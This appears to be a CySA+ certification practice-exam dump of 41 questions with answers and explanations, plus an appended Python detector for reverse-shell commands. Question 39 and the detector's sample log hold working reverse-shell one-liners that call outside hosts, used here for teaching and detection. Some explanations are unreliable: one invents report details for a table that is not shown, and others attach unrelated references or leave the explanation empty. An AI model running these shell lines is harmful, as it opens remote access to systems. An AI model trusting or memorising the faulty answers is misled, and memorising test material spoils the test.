CS0-003.pdf
Questions & Answers PDF
CompTIA CS0-003 Exam
CompTIA CyberSecurity Analyst CySA+ Certification Exam
www.P2PExams.com
Product Questions: 323
Version: 10.0

Question: 1
A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?
A. CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
B. CVSS:3.1/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
C. CVSS:3.1/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
D. CVSS:3.1/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H
Answer: A
Explanation: This answer matches the description of the zero-day threat. The attack vector is network (AV:N), the attack complexity is low (AC:L), no privileges are required (PR:N), no user interaction is required (UI:N), the scope is unchanged (S:U), the confidentiality and integrity impacts are high (C:H/I:H), and the availability impact is low (A:L).
Official Reference: https://nvd.nist.gov/vuln-metrics/cvss

Question: 2
Which of the following tools would work best to prevent the exposure of PII outside of an organization?
A. PAM
B. IDS
C. PKI
D. DLP
Answer: D
Explanation: Data loss prevention (DLP) is a tool that can prevent the exposure of PII outside of an organization by monitoring, detecting, and blocking sensitive data in motion, in use, or at rest.

Question: 3
An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:
(scan output shown as an image in the original; not reproduced)
Which of the following tuning recommendations should the security analyst share?
A. Set an HttpOnly flag to force communication by HTTPS
B. Block requests without an X-Frame-Options header
C. Configure an Access-Control-Allow-Origin header to authorized domains
D.
Disable the cross-origin resource sharing header
Answer: B
Explanation: The output shows that the web application is vulnerable to clickjacking attacks, which allow an attacker to overlay a hidden frame on top of a legitimate page and trick users into clicking on malicious links. Blocking requests without an X-Frame-Options header can prevent this attack by instructing the browser not to display the page within a frame.

Question: 4
Which of the following items should be included in a vulnerability scan report? (Choose two.)
A. Lessons learned
B. Service-level agreement
C. Playbook
D. Affected hosts
E. Risk score
F. Education plan
Answer: D, E
Explanation: A vulnerability scan report should include information about the affected hosts, such as their IP addresses, hostnames, operating systems, and services. It should also include a risk score for each vulnerability, which indicates the severity and potential impact of the vulnerability on the host and the organization.
Official Reference: https://www.first.org/cvss/

Question: 5
The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?
A. A mean time to remediate of 30 days
B. A mean time to detect of 45 days
C. A mean time to respond of 15 days
D. Third-party application testing
Answer: A
Explanation: Mean time to remediate (MTTR) is a metric that measures how long it takes to fix a vulnerability after it is discovered.
An MTTR of 30 days would best protect the organization from the new attacks that are exploited 45 days after a patch is released, as it would ensure that the vulnerabilities are fixed before they are exploited.

Question: 6
A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script:
(script shown as an image in the original; not reproduced)
Which of the following scripting languages was used in the script?
A. PowerShell
B. Ruby
C. Python
D. Shell script
Answer: A
Explanation: The script uses PowerShell syntax, such as cmdlets, parameters, variables, and comments. PowerShell is a scripting language that can be used to automate tasks and manage systems.

Question: 7
A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP; at other times it is accessible through HTTPS. Which of the following most likely describes the observed activity?
A. There is an issue with the SSL certificate causing port 443 to become unavailable for HTTPS access
B. An on-path attack is being performed by someone with internal access that forces users into port 80
C. The web server cannot handle an increasing amount of HTTPS requests, so it forwards users to port 80
D. An error was caused by BGP due to new rules applied over the company's internal routers
Answer: B
Explanation: An on-path attack is a type of man-in-the-middle attack where an attacker intercepts and modifies network traffic between two parties. In this case, someone with internal access may be performing an on-path attack by forcing users into port 80, which is used for HTTP communication, instead of port 443, which is used for HTTPS communication. This would allow the attacker to compromise the user accounts and access the company's internal portal.
Question: 8
A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below:
Security Policy 1006: Vulnerability Management
1. The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the remediation of security vulnerabilities.
2. In situations where a choice must be made between confidentiality and availability, the Company shall prioritize confidentiality of data over availability of systems and data.
3. The Company shall prioritize patching of publicly available systems and services over patching of internally available systems.
According to the security policy, which of the following vulnerabilities should be the highest priority to patch?
(Options A through D are shown as images in the original; not reproduced)
A. Option A
B. Option B
C. Option C
D. Option D
Answer: C
Explanation: According to the security policy, the company shall use the CVSSv3.1 Base Score Metrics to prioritize the remediation of security vulnerabilities. Option C has the highest CVSSv3.1 Base Score of 9.8, which indicates a critical severity level. The company shall also prioritize confidentiality of data over availability of systems and data, and option C has a high impact on confidentiality (C:H). Finally, the company shall prioritize patching of publicly available systems and services over patching of internally available systems, and option C affects a public-facing web server.
Official Reference: https://www.first.org/cvss/

Question: 9
Which of the following will most likely ensure that mission-critical services are available in the event of an incident?
A. Business continuity plan
B. Vulnerability management plan
C. Disaster recovery plan
D. Asset management plan
Answer: C
Explanation:

Question: 10
The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise.
Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?
A. Deploy a CASB and enable policy enforcement
B. Configure MFA with strict access
C. Deploy an API gateway
D. Enable SSO to the cloud applications
Answer: A
Explanation: A cloud access security broker (CASB) is a tool that can help reduce the risk of shadow IT in the enterprise by providing visibility and control over cloud applications and services. A CASB can enable policy enforcement by blocking unauthorized or risky cloud applications, enforcing data loss prevention rules, encrypting sensitive data, and detecting anomalous user behavior.

Question: 11
An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?
A. CDN
B. Vulnerability scanner
C. DNS
D. Web server
Answer: C
Explanation: A distributed denial-of-service (DDoS) attack is a type of cyberattack that aims to overwhelm a target's network or server with a large volume of traffic from multiple sources. A common technique for launching a DDoS attack is to compromise DNS servers, which are responsible for resolving domain names into IP addresses. By flooding DNS servers with malicious requests, attackers can disrupt the normal functioning of the internet and prevent users from accessing external SaaS resources.
Official Reference: https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/cyber-kill-chain-seven-steps-cyberattack/

Question: 12
A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack.
Which of the following best describes the stage of the Cyber Kill Chain in which the threat actor is currently operating?
A. Weaponization
B. Reconnaissance
C. Delivery
D. Exploitation
Answer: D
Explanation: The Cyber Kill Chain is a framework that describes the stages of a cyberattack from reconnaissance to actions on objectives. The exploitation stage is where attackers take advantage of the vulnerabilities they have discovered in previous stages to further infiltrate a target's network and achieve their objectives. In this case, the malicious actor has gained access to an internal network by means of social engineering and does not want to lose access in order to continue the attack. This indicates that the actor is in the exploitation stage of the Cyber Kill Chain.
Official Reference: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html

Question: 13
An analyst finds that an IP address outside of the company network is being used to run network and vulnerability scans across external-facing assets. Which of the following steps of an attack framework is the analyst witnessing?
A. Exploitation
B. Reconnaissance
C. Command and control
D. Actions on objectives
Answer: B
Explanation: Reconnaissance is the first stage in the Cyber Kill Chain and involves researching potential targets before carrying out any penetration testing. The reconnaissance stage may include identifying potential targets, finding their vulnerabilities, discovering which third parties are connected to them (and what data they can access), and exploring existing entry points as well as finding new ones. Reconnaissance can take place both online and offline. In this case, an analyst finds that an IP address outside of the company network is being used to run network and vulnerability scans across external-facing assets. This indicates that the analyst is witnessing reconnaissance activity by an attacker.
Official Reference: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html

Question: 14
An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. Which of the following best describes what is happening? (Choose two.)
A. Beaconing
B. Domain Name System hijacking
C. Social engineering attack
D. On-path attack
E. Obfuscated links
F. Address Resolution Protocol poisoning
Answer: C, E
Explanation: A social engineering attack is a type of cyberattack that relies on manipulating human psychology rather than exploiting technical vulnerabilities. A social engineering attack may involve deceiving, persuading, or coercing users into performing actions that benefit the attacker, such as clicking on malicious links, divulging sensitive information, or granting access to restricted resources. An obfuscated link is a link that has been disguised or altered to hide its true destination or purpose. Obfuscated links are often used by attackers to trick users into visiting malicious websites or downloading malware. In this case, an incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. This indicates that the analyst is witnessing a social engineering attack using obfuscated links.

Question: 15
During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?
A. Conduct regular red team exercises over the application in production
B. Ensure that all implemented coding libraries are regularly checked
C. Use application security scanning as part of the pipeline for the CI/CD flow
D.
Implement proper input validation for any data entry form
Answer: C
Explanation: Application security scanning is a process that involves testing and analyzing applications for security vulnerabilities, such as injection flaws, broken authentication, cross-site scripting, and insecure configuration. Application security scanning can help identify and fix security issues before they become exploitable by attackers. Using application security scanning as part of the pipeline for the continuous integration/continuous delivery (CI/CD) flow can help mitigate the problem of finding the same vulnerabilities in a critical application during security scanning. This is because application security scanning can be integrated into the development lifecycle and performed automatically and frequently as part of the CI/CD process.

Question: 16
An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?
A. Proprietary systems
B. Legacy systems
C. Unsupported operating systems
D. Lack of maintenance windows
Answer: A
Explanation: Proprietary systems are systems that are owned and controlled by a specific vendor or manufacturer, and that use proprietary standards or protocols that are not compatible with other systems. Proprietary systems can pose a challenge for vulnerability management, as they may not allow users to access or modify their configuration, update their software, or patch their vulnerabilities. In this case, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to.
This indicates that these systems and associated vulnerabilities are examples of proprietary systems as inhibitors to remediation.

Question: 17
The security team reviews a web server for XSS and runs the following Nmap scan:
(scan output shown as an image in the original; not reproduced)
Which of the following most accurately describes the result of the scan?
A. An output of characters > and " as the parameters used in the attempt
B. The vulnerable parameter ID http://172.31.15.2/1.php?id=2 and unfiltered characters returned
C. The vulnerable parameter and unfiltered or encoded characters passed > and " as unsafe
D. The vulnerable parameter and characters > and " with a reflected XSS attempt
Answer: D
Explanation: A cross-site scripting (XSS) attack is a type of web application attack that injects malicious code into a web page that is then executed by the browser of a victim user. A reflected XSS attack is a type of XSS attack where the malicious code is embedded in a URL or a form parameter that is sent to the web server and then reflected back to the user's browser. In this case, the Nmap scan shows that the web server is vulnerable to a reflected XSS attack, as it returns the characters > and " without any filtering or encoding. The vulnerable parameter is id in the URL http://172.31.15.2/1.php?id=2.

Question: 18
Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?
A. Develop a call tree to inform impacted users
B. Schedule a review with all teams to discuss what occurred
C. Create an executive summary to update company leadership
D. Review regulatory compliance with public relations for official notification
Answer: B
Explanation: One of the best actions to take after the conclusion of a security incident to improve incident response in the future is to schedule a review with all teams to discuss what occurred, what went well, what went wrong, and what can be improved.
This review is also known as a lessons learned session or an after-action report. The purpose of this review is to identify the root causes of the incident, evaluate the effectiveness of the incident response process, document any gaps or weaknesses in the security controls, and recommend corrective actions or preventive measures for future incidents.
Official Reference: https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/cyber-kill-chain-seven-steps-cyberattack/

Question: 19
A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?
A. Code analysis
B. Static analysis
C. Reverse engineering
D. Fuzzing
Answer: C
Explanation: Reverse engineering is a technique that involves analyzing a binary file to understand its structure, functionality, and behavior. Reverse engineering can help security analysts perform malware analysis, vulnerability research, exploit development, and software debugging. Reverse engineering can be done using various tools, such as disassemblers, debuggers, decompilers, and hex editors.

Question: 20
An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?
A. Hard disk
B. Primary boot partition
C. Malicious files
D. Routing table
E. Static IP address
Answer: A
Explanation: The hard disk is the piece of data that should be collected first in order to preserve sensitive information before isolating the server. The hard disk contains all the files and data stored on the server, which may include evidence of malicious activity, such as malware installation, data exfiltration, or configuration changes.
The hard disk should be collected using proper forensic techniques, such as creating an image or a copy of the disk and maintaining its integrity using hashing algorithms.

Question: 21
Which of the following security operations tasks are ideal for automation?
A. Suspicious file analysis:
   Look for suspicious-looking graphics in a folder.
   Create subfolders in the original folder based on category of graphics found.
   Move the suspicious graphics to the appropriate subfolder.
B. Firewall IoC block actions:
   Examine the firewall logs for IoCs from the most recently published zero-day exploit.
   Take mitigating actions in the firewall to block the behavior found in the logs.
   Follow up on any false positives that were caused by the block rules.
C. Security application user errors:
   Search the error logs for signs of users having trouble with the security application.
   Look up the user's phone number.
   Call the user to help with any questions about using the application.
D. Email header analysis:
   Check the email header for a phishing confidence metric greater than or equal to five.
   Add the domain of sender to the block list.
   Move the email to quarantine.
Answer: D
Explanation: Email header analysis is one of the security operations tasks that are ideal for automation. Email header analysis involves checking the email header for various indicators of phishing or spamming attempts, such as sender address spoofing, mismatched domains, suspicious subject lines, or phishing confidence metrics. Email header analysis can be automated using tools or scripts that can parse and analyze email headers and take appropriate actions based on predefined rules or thresholds.

Question: 22
An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?
A. PCI Security Standards Council
B. Local law enforcement
C. Federal law enforcement
D.
Card issuer
Answer: D
Explanation: Under the terms of PCI DSS, an organization that has experienced a breach of customer transactions should report the breach to the card issuer. The card issuer is the financial institution that issues the payment cards to the customers and that is responsible for authorizing and processing the transactions. The card issuer may have specific reporting requirements and procedures for the organization to follow in the event of a breach. The organization should also notify other parties that may be affected by the breach, such as customers, law enforcement, or regulators, depending on the nature and scope of the breach.
Official Reference: https://www.pcisecuritystandards.org/

Question: 23
Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?
A. Mean time to detect
B. Number of exploits by tactic
C. Alert volume
D. Quantity of intrusion attempts
Answer: A
Explanation: Mean time to detect (MTTD) is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system. MTTD is a metric that measures how long it takes to detect a security incident or threat from the time it occurs. MTTD can be improved by using tools and processes that can collect, correlate, analyze, and alert on security data from various sources. SIEM, SOAR, and ticketing systems are examples of such tools and processes that can help reduce MTTD and enhance security operations.
Official Reference: https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/cyber-kill-chain-seven-steps-cyberattack

Question: 24
A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?
A.
The current scanners should be migrated to the cloud
B. Cloud-specific misconfigurations may not be detected by the current scanners
C. Existing vulnerability scanners cannot scan IaaS systems
D. Vulnerability scans on cloud environments should be performed from the cloud
Answer: B
Explanation: Cloud-specific misconfigurations are security issues that arise from improper or inadequate configuration of cloud resources, such as storage buckets, databases, virtual machines, or containers. Cloud-specific misconfigurations may not be detected by the current scanners that are designed for on-premises environments, as they may not have the visibility or access to the cloud resources or the cloud provider's APIs. Therefore, one of the implications that should be considered on the new hybrid environment is that cloud-specific misconfigurations may not be detected by the current scanners.

Question: 25
A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user's workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?
A. Create a timeline of events detailing the date stamps, user account, hostname and IP information associated with the activities
B. Ensure that the case details do not reflect any user-identifiable information. Password protect the evidence and restrict access to personnel related to the investigation
C. Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identify the case as an HR-related investigation
D.
Notify the SOC manager for awareness after confirmation that the activity was intentional
Answer: B
Explanation: The best way to ensure that the investigation complies with HR or privacy policies is to ensure that the case details do not reflect any user-identifiable information, such as name, email address, phone number, or employee ID. This can help protect the privacy and confidentiality of the user and prevent any potential discrimination or retaliation. Additionally, password protecting the evidence and restricting access to personnel related to the investigation can help preserve the integrity and security of the evidence and prevent any unauthorized or accidental disclosure or modification.

Question: 26
Which of the following is the first step that should be performed when establishing a disaster recovery plan?
A. Agree on the goals and objectives of the plan
B. Determine the site to be used during a disaster
C. Demonstrate adherence to a standard disaster recovery process
D. Identify applications to be run during a disaster
Answer: A
Explanation: The first step that should be performed when establishing a disaster recovery plan is to agree on the goals and objectives of the plan. The goals and objectives of the plan should define what the plan aims to achieve, such as minimizing downtime, restoring critical functions, ensuring data integrity, or meeting compliance requirements. The goals and objectives of the plan should also be aligned with the business needs and priorities of the organization and be measurable and achievable.

Question: 27
A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?
A. Testing
B. Implementation
C. Validation
D. Rollback
Answer: C
Explanation: The next step in the remediation process after applying a software patch is validation.
Validation is a process that involves verifying that the patch has been successfully applied, that it has fixed the vulnerability, and that it has not caused any adverse effects on the system or application functionality or performance. Validation can be done using various methods, such as scanning, testing, monitoring, or auditing.

Question: 28
The analyst reviews the following endpoint log entry:
(log entry shown as an image in the original; not reproduced)
Which of the following has occurred?
A. Registry change
B. Rename computer
C. New account introduced
D. Privilege escalation
Answer: C
Explanation: The endpoint log entry shows that a new account named "admin" has been created on a Windows system with a local group membership of "Administrators". This indicates that a new account has been introduced on the system with administrative privileges. This could be a sign of malicious activity, such as privilege escalation or backdoor creation, by an attacker who has compromised the system.

Question: 29
A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?
A. Data enrichment
B. Security control plane
C. Threat feed combination
D. Single pane of glass
Answer: D
Explanation: A single pane of glass is a term that describes a unified view or interface that integrates multiple tools or data sources into one dashboard or console. A single pane of glass can help improve security operations by providing visibility, correlation, analysis, and alerting capabilities across various security controls and systems. A single pane of glass can also help reduce complexity, improve efficiency, and enhance decision making for security analysts.
In this case, a security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM, which provides a single pane of glass for security operations.
Official Reference: https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/cyber-kill-chain-seven-steps-cyberattack

Question: 30
Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment. Given the following output:
(Nmap output shown as an image in the original; not reproduced)
Which of the following choices should the analyst look at first?
A. wh4dc-748gy.lan (192.168.86.152)
B. lan (192.168.86.22)
C. imaging.lan (192.168.86.150)
D. xlaptop.lan (192.168.86.249)
E. p4wnp1_aloa.lan (192.168.86.56)
Answer: E
Explanation: The analyst should look at p4wnp1_aloa.lan (192.168.86.56) first, as this is the most suspicious device on the network. P4wnP1 ALOA is a tool that can be used to create a malicious USB device that can perform various attacks, such as keystroke injection, network sniffing, man-in-the-middle, or backdoor creation. The presence of a device with this name on the network could indicate that an attacker has plugged in a malicious USB device to a system and gained access to the network.
Official Reference: https://github.com/mame82/P4wnP1_aloa

Question: 31
When starting an investigation, which of the following must be done first?
A. Notify law enforcement
B. Secure the scene
C. Seize all related evidence
D. Interview the witnesses
Answer: B
Explanation: The first thing that must be done when starting an investigation is to secure the scene. Securing the scene involves isolating and protecting the area where the incident occurred, as well as any potential evidence or witnesses.
Securing the scene can help prevent any tampering, contamination, or destruction of evidence, as well as any interference or obstruction of the investigation.

Question: 32
Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?
A. The lead should review what is documented in the incident response policy or plan
B. Management level members of the CSIRT should make that decision
C. The lead has the authority to decide who to communicate with at any time
D. Subject matter experts on the team should communicate with others within the specified area of expertise
Answer: A
Explanation: The incident response policy or plan is a document that defines the roles and responsibilities, procedures and processes, communication and escalation protocols, and reporting and documentation requirements for handling security incidents. The lead should review what is documented in the incident response policy or plan to determine who should be communicated with and when during a security incident, as well as what information should be shared and how. The incident response policy or plan should also be aligned with the organizational policies and legal obligations regarding incident notification and disclosure.

Question: 33
A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?
A. Firewall logs
B. Indicators of compromise
C. Risk assessment
D. Access control lists
Answer: B
Explanation: Indicators of compromise (IoCs) are pieces of data or evidence that suggest a system or network has been compromised by an attacker or malware. IoCs can include IP addresses, domain names, URLs, file hashes, registry keys, network traffic patterns, user behaviors, or system anomalies.
IoCs can be used to detect, analyze, and respond to security incidents, as well as to share threat intelligence with other organizations or authorities. IoCs can produce the data needed for an executive briefing on possible threats to the organization, as they provide information on the source, nature, scope, impact, and mitigation of the threats.

Question: 34
An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?
A. Beaconing
B. Cross-site scripting
C. Buffer overflow
D. PHP traversal
Answer: A
Explanation: Beaconing is periodic outbound traffic from a compromised internal host to attacker-controlled infrastructure, used by malware to check in with its command and control (C2) server. Traffic from an internal device to a known-malicious external IP, wrapped in HTTPS to blend in but carrying non-standard header content, fits that pattern. The other options are attacks against applications (cross-site scripting, PHP directory traversal) or memory (buffer overflow); none of them describes outbound traffic to a malicious address.

Question: 35
A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?
A. Change the display filter to ftp.active.port
B. Change the display filter to tcp.port==20
C. Change the display filter to ftp-data and follow the TCP streams
D. Navigate to the File menu and select FTP from the Export Objects option
Answer: C
Explanation: FTP uses two connections: the control channel on TCP port 21, which carries commands such as RETR and replies such as 226 Transfer complete, and a separate data channel that carries the file bytes. The ftp display filter matches only the control channel, which is why the transfers are missing from the packet list. ftp-data is Wireshark's dissector for the data channel; filtering on it and following the TCP stream of a matching packet reconstructs the transferred file. Filtering on tcp.port==20 (B) works only for active-mode transfers, where the server connects from port 20; in passive mode the data connection uses a server-chosen high port, but ftp-data still matches it because Wireshark learns the data-channel endpoints from the PORT and PASV exchange on the control channel.

Question: 36
A SOC manager receives a phone call from an upset customer.
The customer received a vulnerability report two hours ago, but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?
A. SLA
B. MOU
C. NDA
D. Limitation of liability
Answer: A
Explanation: SLA stands for service level agreement, a contract or document that defines the expectations and obligations between a service provider and a customer regarding the quality, availability, performance, or scope of a service. An SLA typically specifies measurable targets such as response time, resolution time, reporting frequency, and communication channels, together with the penalties or remedies that apply when they are missed. Reviewing the SLA tells the SOC manager whether a two-hour gap between a vulnerability report and an analyst's response actually breaches a contractual obligation. An MOU, an NDA, and a limitation of liability clause do not define service response targets.

Question: 37
Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?
A. Command and control
B. Actions on objectives
C. Exploitation
D. Delivery
Answer: A
Explanation: Command and control (C2) is the phase of the Cyber Kill Chain in which the adversary establishes a communication channel to a target that has already been exploited and implanted. C2 lets the adversary remotely control or manipulate the target system or network using methods such as malware callbacks, backdoors, botnets, or covert channels, and it is the channel through which the adversary maintains persistence, exfiltrates data, executes commands, delivers further payloads, or spreads to other systems or networks. Delivery and exploitation precede it, and actions on objectives depend on it.

Question: 38
A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?
A. External
B. Agent-based
C. Non-credentialed
D.
Credentialed
Answer: B
Explanation: Agent-based vulnerability scanning installs a software agent on each target system; the agent scans the host locally and reports only its results to a central server or console. Because the scan itself never crosses the network, traffic is reduced to small result uploads, and because the agent reports in on its own schedule, it works for hosts with dynamic IP addresses or in remote locations that a network scanner could not reliably reach. Agents can also scan continuously or on demand regardless of where the host is connected, which keeps results current. External, non-credentialed, and credentialed scans are all network-based and must reach every host across the network, generating the traffic the company wants to avoid.

Question: 39
A security analyst detects an exploit attempt containing the following command:
sh -i >& /dev/udp/10.1.1.1/4821 0>&1
Which of the following is being attempted?
A. RCE
B. Reverse shell
C. XSS
D. SQL injection
Answer: B
Explanation: A reverse shell reverses the normal direction of the connection: instead of the attacker connecting in to a listening service, the target system initiates an outbound connection to the attacker's listener and attaches a shell to it. Because it uses an outgoing connection, it bypasses firewalls and other controls that block only inbound connections. The command does this in a single line: sh -i starts an interactive shell; >& /dev/udp/10.1.1.1/4821 redirects the shell's standard output and standard error to a UDP socket that the shell opens to 10.1.1.1 port 4821 through its /dev/udp pseudo-device; and 0>&1 redirects standard input from that same socket, so the attacker's keystrokes reach the shell and its output flows back. The /dev/tcp and /dev/udp pseudo-devices are a bash feature rather than a kernel device, so the one-liner works only where sh is bash, and a UDP transport gives the attacker an unreliable channel, which is why /dev/tcp variants are far more common. The attacker's goal is remote command execution, but the technique shown is a reverse shell, so B is the most precise answer.

Question: 40
An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?
A. Scope
B.
Weaponization
C. CVSS
D. Asset value
Answer: B
Explanation: Weaponization describes an adversary developing or acquiring an exploit or payload that takes advantage of a vulnerability and delivers a malicious effect. Once a working exploit is widely available and in active use, the likelihood that an attacker exploits the vulnerability successfully rises sharply, so its effective severity rises even though the underlying flaw is unchanged. Weaponization also indicates the sophistication or motivation of the attackers and the popularity of an exploit in the threat landscape. In this case an older CVE's score was raised from 7.1 to 9.8 because a widely available exploit was being used to deliver ransomware, so the analyst would communicate weaponization as the reason. Scope and asset value did not change, and CVSS is the scoring system rather than the reason for the change.

Question: 41
An analyst is reviewing a vulnerability report for a server environment with the following entries:
Which of the following systems should be prioritized for patching first?
A. 10.101.27.98
B. 54.73.225.17
C. 54.74.110.26
D. 54.74.110.228
Answer: D
Explanation: The system that should be prioritized for patching first is 54.74.110.228, as it has the highest number and severity of vulnerabilities among the four systems listed in the vulnerability report. According to the report, this system has 12 vulnerabilities, with 8 critical, 3 high, and 1 medium severity ratings. The critical vulnerabilities include CVE-2019-0708 (BlueKeep), CVE-2019-1182 (DejaBlue), CVE-2017-0144 (EternalBlue), and CVE-2017-0145 (EternalRomance), all remote code execution vulnerabilities in RDP and SMB that allow an attacker to compromise the system without any user interaction or authentication. Because 54.74.110.228 is a publicly routable address, these wormable flaws are reachable from the internet, so they pose the highest risk and should be patched as soon as possible.
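As an added example for Question 39 above, written for this page rather than taken from the exam or any vendor: the detector below recognises reverse-shell one-liners of the kind shown in that question (bash /dev/tcp and /dev/udp redirections, and netcat with -e or -c executing a shell) in captured command lines and extracts the callback endpoint. The audit lines it runs over are constructed, and the tab-separated user/command layout is an assumption, not a real log format.

```python
"""Added example for Question 39 (not part of the original question bank): recognise
reverse-shell one-liners in captured command lines and pull out the callback endpoint.
The audit lines at the bottom are constructed for this example."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# bash opens a socket when a redirection targets /dev/tcp/<host>/<port> or /dev/udp/...
DEV_SOCKET = re.compile(r"/dev/(?P<proto>tcp|udp)/(?P<host>[\w.\-]+)/(?P<port>\d{1,5})")
INTERACTIVE_SHELL = re.compile(r"\b(?:ba)?sh\s+-i\b")      # sh -i, bash -i, /bin/sh -i
STDIN_FROM_SOCKET = re.compile(r"\b0[<>]&\d")               # 0>&1, 0<&3 ...
NETCAT = re.compile(r"\b(?:nc|ncat|netcat)\b(?P<args>[^|;&]*)")
NC_EXEC_SHELL = re.compile(r"\s-[a-zA-Z]*[ec]\b\s*\S*sh\b")  # -e /bin/sh, -c sh
NC_UDP = re.compile(r"\s-[a-zA-Z]*u\b")
# host must be an IPv4 address or a dotted hostname; port must be a whole token
NC_TARGET = re.compile(
    r"(?P<host>\d{1,3}(?:\.\d{1,3}){3}|[\w\-]+(?:\.[\w\-]+)+)\s+(?P<port>\d{1,5})(?!\S)")


@dataclass
class ReverseShell:
    proto: str
    host: str
    port: int
    technique: str


def detect_reverse_shell(cmd: str) -> Optional[ReverseShell]:
    """Return the callback endpoint when cmd wires a shell to an outbound socket.

    A bare /dev/tcp redirection is also used for harmless port checks, so the bash
    form is flagged only when an interactive shell is started or stdin is redirected
    from the socket; netcat is flagged only when -e/-c runs a shell."""
    m = DEV_SOCKET.search(cmd)
    if m and (INTERACTIVE_SHELL.search(cmd) or STDIN_FROM_SOCKET.search(cmd)):
        return ReverseShell(m["proto"], m["host"], int(m["port"]),
                            f"shell redirected to /dev/{m['proto']}")
    for nc in NETCAT.finditer(cmd):
        args = nc["args"]
        target = NC_TARGET.search(args)
        if NC_EXEC_SHELL.search(args) and target:
            proto = "udp" if NC_UDP.search(args) else "tcp"
            return ReverseShell(proto, target["host"], int(target["port"]),
                                "netcat executing a shell")
    return None


def scan_command_log(lines: List[str]) -> List[Tuple[int, ReverseShell]]:
    """Run the detector over 'user<TAB>command' audit lines (assumed layout);
    return (line number, finding) for each hit."""
    findings = []
    for n, line in enumerate(lines, 1):
        if "\t" not in line:
            continue
        _user, cmd = line.split("\t", 1)
        hit = detect_reverse_shell(cmd)
        if hit:
            findings.append((n, hit))
    return findings


# Constructed audit lines; only lines 1 and 3 are reverse shells.
SAMPLE_LOG = [
    "www-data\tsh -i >& /dev/udp/10.1.1.1/4821 0>&1",
    "deploy\tbash -c 'exec 3<>/dev/tcp/db.internal/5432'",   # port check, benign
    "www-data\tnc -e /bin/sh 203.0.113.5 4444",
    "ops\tcurl -s https://10.1.1.1:4821/health",
]

if __name__ == "__main__":
    for n, hit in scan_command_log(SAMPLE_LOG):
        print(f"line {n}: {hit.technique} -> {hit.proto}://{hit.host}:{hit.port}")
```

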